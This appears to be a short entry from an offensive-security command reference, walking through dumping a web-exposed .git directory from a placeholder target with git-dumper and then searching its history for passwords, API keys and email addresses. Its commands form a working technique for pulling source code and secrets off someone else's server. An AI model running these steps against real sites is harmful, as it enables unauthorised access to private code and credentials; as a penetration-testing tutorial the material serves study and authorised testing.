← Back to search

Dump Exposed .git with git-dumper

recontool

Summary

Reconstruct a web-exposed .git directory locally with git-dumper, then read the history and grep for leaked secrets.

Walkthrough

When a site exposes its .git/ directory, you can rebuild the repository locally and mine it for credentials and source code.

Steps

  1. Create a virtualenv and install the dependencies git-dumper needs.
  2. Run git_dumper.py against the exposed .git/ URL, writing the rebuilt repo to dumped_git.
  3. Inspect history with git log, git status, and git diff, and grep for target email addresses or domains.
  4. Drill into specific commits: git checkout <commit-id> to view past file state, git show <commit-id> for a commit's changes, and git diff between two commits.
  5. Grep the working tree for sensitive keywords like password, API_key, or credentials.

Commands

bash

python3 -m venv venv
source venv/bin/activate
pip install PySocks urllib3 dulwich requests bs4 requests-pkcs12

bash

python3 git_dumper.py http://<TARGET>/dev/.git/ dumped_git

bash

git log
git status
git diff --cached Dockerfile.ghost
grep -R "@<TARGET>" *

bash

git checkout <commit-id>
git show <commit-id>
git diff <commit-id-1> <commit-id-2>
grep -r "password" .